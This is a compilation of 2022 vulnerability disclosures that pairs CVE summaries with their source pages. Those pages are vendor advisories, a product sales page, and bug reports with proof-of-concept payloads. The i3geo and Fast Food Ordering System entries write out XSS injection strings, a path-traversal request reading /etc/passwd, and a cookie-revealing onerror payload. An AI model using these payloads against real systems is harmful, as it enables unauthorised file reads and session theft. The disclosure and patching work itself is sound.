Honeywell Alerton Ascent Control Module (ACM) through 2022-05-04 allows unauthenticated programming writes from remote users. This enables code to be store on the controller and then run without verification. A user with malicious intent can send a crafted packet to change and/or stop the program without the knowledge of other users, altering the controller's function. After the programming change, the program needs to be overwritten in order for the controller to restore its original operational function.

CVE-2022-30244: Product Security

Arox School ERP Pro v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the dispatchcategory parameter in backoffice.inc.php.

**About School ERP**

School ERP is a web based school management system that enables school to use and operate many of integrated interrelated modules and manages the administration of school efficiently. Due to its ever growing and competitive nature, the education sector has always been in need of a quality solution to manage and serve the school resources efficiently. It sector is giving number of solutions to schools like smart classroom, digital learning solutions and school management system to make learning easier and manage school administration effectively. Today educational institution is not limited to imparting education alone, but it is adapting latest trends in it for improving the quality of education and handling various activities of school including admissions, class management, library management, logistics, inventory, fee management, certificate, accounts etc. We offer School ERP which simplifies and automates schools administration process. The school management system is accurate and reliable and can be conveniently accessed from school internet as well as from the public internet. It is fully browser based school management system which also includes virtual campus which can be linked with school portal and contains powerful online access to bring parents, teachers and students on a common interactive platform. Yet another advantage of the ERP system is that it runs on minimal hardware and easily fits in the budget of schools. In ERP users have role based access rights which tightly models existing schools hierarchy. School ERP is totally customizable according to the needs of school.

**Features of School ERP:**

*   Fees Management
*   Attendance Management
*   Certificate/ Notice Creation and Printing
*   Examination & Results
*   Class & Time Table Management
*   Transportation Management
*   Financial Accounts Management

*   Purchase and Store Management
*   Accounting Management
*   Event Management
*   Front Office Management
*   Human Resource Management
*   Employee Management.(Leave, Tax, Pay Slip, Deduction)
*   Notification Management

*   Hostel Management
*   ID Card Printing
*   Security Management- Visitors. Record, Report
*   Notice Board
*   Library Management
*   Videos
*   Photo Gallery

**Projects**

**You'll get two projects(both pro and responsive versions) with Source Code****Technology: PHP/mySQL**

*   Check first two versions demo(Pro and Responsive version demo), You'll get both projects at a nominal cost here.

*   **Pricing:**
*   Indians: Rs.15499/- Rs.1999/-
*   Non-Indians: USD 249/- USD 39/-

*   **Buy Now:**
*   Indian Customers click here
*   Non-Indian Customers click here

**FAQs**

Will I get editable/non-encrypted source code on purchase of any of above product?

Yes, you'll get complete source code on purchase of any product. You can easily edit/customize it with help of a PHP Developer.

What technologies are used in School ERP Pro and School ERP Responsive?

PHP with mySQL database is used.

What is the difference between School ERP Pro, School ERP Responsive and Pro+Responsive Combo?

The basic difference between School ERP Pro and School ERP Responsive is their User Interface Design. School ERP Pro comes with table based design. And School ERP Responsive comes with latest Bootstrap based design which is device friendly layout.  
And Pro+Responsive Combo is not a third project. In this package you get two projects:- School ERP Pro and School ERP Responsive

If I want to upgrade Pro version to Responsive version, Should I pay remaining amount between School ERP Pro and School ERP Responsive?

No, You'll have to pay the amount between Pro+Responsive Combo and Your previously purchased product.

**© 2021. All rights reserved**

CVE-2022-32118: School Management System with Source Code

In affected versions of Octopus Server the help sidebar can be customized to include a Cross-Site Scripting payload in the support link.

Summary

Stored Cross-Site Scripting (XSS) in Octopus Server help sidebar (CVE-2022-29890)

Advisory Number

2022-07

Discovery Date

19 May 2022

Patch Release Date

14 Jun 2022

Advisory Release Date

15 Jul 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-29890

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6729 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy security levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Server the help sidebar can be customized to include a Cross-Site Scripting payload in the support link.

The versions of Octopus Server affected by this vulnerability are:

*   All 2019.7.x, 2019.8.x, 2019.9.x, 2019.10.x, 2019.11.x, 2019.12.x, 2019.13.x versions
*   All 2020.x.x versions
*   All 2021.x.x versions before 2021.3.13021
*   All 2022.1.x versions before 2022.1.2849
*   All 2022.2.x versions before 2022.2.6729
*   All 2022.3.x versions before 2022.3.2387

As of the 15/07/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2021.3.13021
*   2022.1.2849
*   2022.2.6729
*   2022.3.2387

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6729). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6729):**

If you have feature version...

...then upgrade to this version

2019.7.x, 2019.8.x, 2019.9.x, 2019.10.x, 2019.11.x, 2019.12.x, 2019.13.x, 2020.x.x

2021.3.13021 or greater

2021.x.x

2021.3.13021 or greater

2022.1.x

2022.1.2849 or greater

2022.2.x

2022.2.6729 or greater

2022.3.x

2022.3.2387 or greater

**Mitigation**

There is no known mitigation for CVE-2022-29890, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team (https://octopus.com/support).

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-29890: Security Advisory 2022-07

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.

Boa tarde

A vulnerabilidade em questão está no arquivo request\_token.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

http://.../i3geo/pacotes/linkedinoauth/example/request\_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--  
Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34094: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - request_token.php · Issue #5 · edmarmoretti/i3geo

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.

Boa tarde

A vulnerabilidade em questão está no arquivo access\_token.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

*   http://.../i3geo/pacotes/linkedinoauth/example/access\_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34093: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - access_token.php · Issue #4 · saladesituacao/i3geo

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via svg2img.php.

Boa tarde

A vulnerabilidade em questão está no arquivo svg2img.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

*   http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34092: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - svg2img.php · Issue #3 · saladesituacao/i3geo

A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request.

Permalink

Cannot retrieve contributors at this time

####################################

\# LFI - Local File Inclusion #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a LFI (Local File Inclusion) in codemirror.php file. The file is located in the "exemplos" folder (/i3geo/exemplos/).

To exploit vulnerability:

\- http://.../i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd

\- http://.../i3geo/exemplos/codemirror.php?&pagina=data://text/plain;base64,SEFDS0VE

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in svg2img.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in access\_token.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/linkedinoauth/example/access\_token.php?=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in request\_token.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/linkedinoauth/example/request\_token.php?=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

CVE-2022-32409: ProofOfConcept/i3geo_proof_of_concept.txt at main · wagnerdracha/ProofOfConcept

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

CVE-2022-32318: Fast Food Ordering System 1.0 Cross Site Scripting ≈ Packet Storm

IBM WebSphere Application Server 8.5 and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 225605.

**Security Bulletin**

  

**Summary**

IBM WebSphere Application Server is vulnerable to cross-site scripting in the Admin Console. This has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-22477  
**DESCRIPTION:**   IBM WebSphere Application Server is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 6.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225605 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server

9.0

IBM WebSphere Application Server

8.5

**Remediation/Fixes**

 IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH46332.

**For IBM WebSphere Application Server traditional:**

**For V9.0.0.0 through 9.0.5.12:**  
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix  PH46332  
\--OR--  
· Apply Fix Pack 9.0.5.13 or later (targeted availability 3Q2022). 

**For V8.5.0.0 through 8.5.5.21:**  
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH46332  
\--OR--  
· Apply Fix Pack 8.5.5.22 or later (targeted availability 3Q2022). 

Additional interim fixes may be available and linked off the interim fix download page.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Lukasz Plonka.

**Change History**

13 July 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"}\],"Version":"7.0, 8.0, 8.5, 9.0","Edition":"Advanced,Base,Developer,Enterprise,Express,Network Deployment,Single Server","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22477: IBM WebSphere Application Server is vulnerable to Cross-site Scripting (CVE-2022-22477)

IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 213866.

Tag

#xss